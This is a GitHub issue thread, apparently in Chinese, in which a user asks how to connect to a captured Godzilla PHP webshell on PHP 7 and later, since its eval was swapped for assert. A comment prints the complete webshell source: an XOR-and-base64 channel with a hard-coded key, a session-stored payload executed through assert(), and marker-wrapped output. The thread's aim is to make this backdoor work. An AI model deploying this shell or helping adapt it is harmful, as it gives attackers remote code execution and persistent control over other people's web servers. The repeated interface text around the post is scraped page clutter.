php7以上assert马该怎么连？ #91

myweaven · 2023-03-20T05:03:55Z

抓到一直哥斯拉马，他把默认生成的马里的eval改成assert了，在php5.6可以正常连接，php7以上就不行了，那么在php7以上改如何利用呢？马如下：

myweaven · 2023-03-20T05:04:40Z

@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
assert($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

php7以上assert马该怎么连？ #91

php7以上assert马该怎么连？ #91

myweaven commented Mar 20, 2023

myweaven commented Mar 20, 2023 •

edited

Loading

php7以上assert马该怎么连？ #91

php7以上assert马该怎么连？ #91

Comments

myweaven commented Mar 20, 2023

myweaven commented Mar 20, 2023 • edited Loading

myweaven commented Mar 20, 2023 •

edited

Loading